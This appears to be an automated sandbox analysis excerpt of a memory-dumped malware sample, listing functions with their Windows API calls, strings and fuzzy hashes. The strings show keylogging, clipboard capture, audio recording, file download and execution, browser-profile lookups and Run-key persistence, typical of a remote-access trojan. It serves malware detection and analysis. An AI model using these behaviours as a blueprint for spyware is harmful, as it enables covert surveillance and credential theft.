                                                  • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorHandling__start
                                                  • String ID: pow
                                                  • API String ID: 3213639722-2276729525
                                                  • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                  • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                  • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                  • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                  APIs
                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                  • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Init_thread_footer__onexit
                                                  • String ID: [End of clipboard]$[Text copied to clipboard]
                                                  • API String ID: 1881088180-3686566968
                                                  • Opcode ID: ed48047f974fffac8e7a9b5da0f857699ac9eabc6e4f24e176e756ae766f8f96
                                                  • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                                  • Opcode Fuzzy Hash: ed48047f974fffac8e7a9b5da0f857699ac9eabc6e4f24e176e756ae766f8f96
                                                  • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                                  APIs
                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ACP$OCP
                                                  • API String ID: 0-711371036
                                                  • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                  • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                  • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                  • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                  Strings
                                                  • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime
                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                  • API String ID: 481472006-1507639952
                                                  • Opcode ID: 76d5dd6ecd4cf0ae01fc24a6e422c0d46a6680b11c9869ab6839a1ab8c86e845
                                                  • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                                  • Opcode Fuzzy Hash: 76d5dd6ecd4cf0ae01fc24a6e422c0d46a6680b11c9869ab6839a1ab8c86e845
                                                  • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                                  APIs
                                                  • Sleep.KERNEL32 ref: 0041667B
                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DownloadFileSleep
                                                  • String ID: !D@
                                                  • API String ID: 1931167962-604454484
                                                  • Opcode ID: 9cbcf339d5782d21f0009647a5314bbf722ddb95791e80143436529d650ea742
                                                  • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                                  • Opcode Fuzzy Hash: 9cbcf339d5782d21f0009647a5314bbf722ddb95791e80143436529d650ea742
                                                  • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                                  APIs
                                                  • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime
                                                  • String ID: | $%02i:%02i:%02i:%03i
                                                  • API String ID: 481472006-2430845779
                                                  • Opcode ID: 4182ea60a7d59cd3c4daa7da87bafc9d2ec88e2c779713b19cbff176a10afb6b
                                                  • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                                  • Opcode Fuzzy Hash: 4182ea60a7d59cd3c4daa7da87bafc9d2ec88e2c779713b19cbff176a10afb6b
                                                  • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: alarm.wav$hYG
                                                  • API String ID: 1174141254-2782910960
                                                  • Opcode ID: 7299a0d0e5ac02ff6f364a1a3c16a6a2a961f287bfd76f0f9db8fc182607aab3
                                                  • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                                                  • Opcode Fuzzy Hash: 7299a0d0e5ac02ff6f364a1a3c16a6a2a961f287bfd76f0f9db8fc182607aab3
                                                  • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                                                  APIs
                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                  • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                  • String ID: Online Keylogger Stopped
                                                  • API String ID: 1623830855-1496645233
                                                  • Opcode ID: d648d1a5222b06a5ee4967885c863a2486092fd33b051c0742ca5bf23bf5bbb2
                                                  • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                                  • Opcode Fuzzy Hash: d648d1a5222b06a5ee4967885c863a2486092fd33b051c0742ca5bf23bf5bbb2
                                                  • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                                  APIs
                                                  • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                                  • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$BufferHeaderPrepare
                                                  • String ID: XMG
                                                  • API String ID: 2315374483-813777761
                                                  • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                  • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                  • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                  • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                  APIs
                                                  • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocaleValid
                                                  • String ID: IsValidLocaleName$kKD
                                                  • API String ID: 1901932003-3269126172
                                                  • Opcode ID: e2be842f2307acef5cef967ff3e72c46beaafbec9f28b2cc6d0622aebebc3446
                                                  • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                                  • Opcode Fuzzy Hash: e2be842f2307acef5cef967ff3e72c46beaafbec9f28b2cc6d0622aebebc3446
                                                  • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                  • API String ID: 1174141254-4188645398
                                                  • Opcode ID: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                  • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                                  • Opcode Fuzzy Hash: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                  • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                  • API String ID: 1174141254-2800177040
                                                  • Opcode ID: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                  • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                                  • Opcode Fuzzy Hash: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                  • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: AppData$\Opera Software\Opera Stable\
                                                  • API String ID: 1174141254-1629609700
                                                  • Opcode ID: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                  • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                                  • Opcode Fuzzy Hash: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                  • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                                  APIs
                                                  • GetKeyState.USER32(00000011), ref: 0040B686
                                                    • Part of subcall function 0040A41B: GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A451
                                                    • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                    • Part of subcall function 0040A41B: GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                    • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                    • Part of subcall function 0040A41B: GetKeyboardState.USER32(?,?,004750F0), ref: 0040A479
                                                    • Part of subcall function 0040A41B: ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                    • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                  • String ID: [AltL]$[AltR]
                                                  • API String ID: 2738857842-2658077756
                                                  • Opcode ID: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                  • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                                  • Opcode Fuzzy Hash: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                  • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExecuteShell
                                                  • String ID: !D@$open
                                                  • API String ID: 587946157-1586967515
                                                  • Opcode ID: 33d0e39c2c5277f948c9383974d65c92f33d2ad08035dd6aa383958bc01fb2b1
                                                  • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                  • Opcode Fuzzy Hash: 33d0e39c2c5277f948c9383974d65c92f33d2ad08035dd6aa383958bc01fb2b1
                                                  • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                  APIs
                                                  • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: State
                                                  • String ID: [CtrlL]$[CtrlR]
                                                  • API String ID: 1649606143-2446555240
                                                  • Opcode ID: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                  • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                  • Opcode Fuzzy Hash: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                  • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                  APIs
                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                  • __Init_thread_footer.LIBCMT ref: 00410F64
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Init_thread_footer__onexit
                                                  • String ID: ,kG$0kG
                                                  • API String ID: 1881088180-2015055088
                                                  • Opcode ID: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                  • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                                  • Opcode Fuzzy Hash: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                  • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                                                  APIs
                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D17F,00000000,004752D8,004752F0,?,pth_unenc), ref: 00413A6C
                                                  • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413A80
                                                  Strings
                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteOpenValue
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                  • API String ID: 2654517830-1051519024
                                                  • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                  • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                                  • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                  • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                                  APIs
                                                  • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                                                  • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteDirectoryFileRemove
                                                  • String ID: pth_unenc
                                                  • API String ID: 3325800564-4028850238
                                                  • Opcode ID: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                  • Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
                                                  • Opcode Fuzzy Hash: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                  • Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
                                                  APIs
                                                  • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                  • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ObjectProcessSingleTerminateWait
                                                  • String ID: pth_unenc
                                                  • API String ID: 1872346434-4028850238
                                                  • Opcode ID: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                  • Instruction ID: 30425768eaae71e8f6d4d073063fb5581f05561c6d480f36d281b696a9d2b878
                                                  • Opcode Fuzzy Hash: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                  • Instruction Fuzzy Hash: DBD01234149312FFD7310F60EE4DB443B589705362F140361F439552F1C7A589D4AB58
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                                  • GetLastError.KERNEL32 ref: 00440D85
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                  • String ID:
                                                  • API String ID: 1717984340-0
                                                  • Opcode ID: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                  • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                                  • Opcode Fuzzy Hash: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                  • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                                  APIs
                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                                  • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                                                  • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastRead
                                                  • String ID:
                                                  • API String ID: 4100373531-0
                                                  • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                  • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                                  • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                  • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99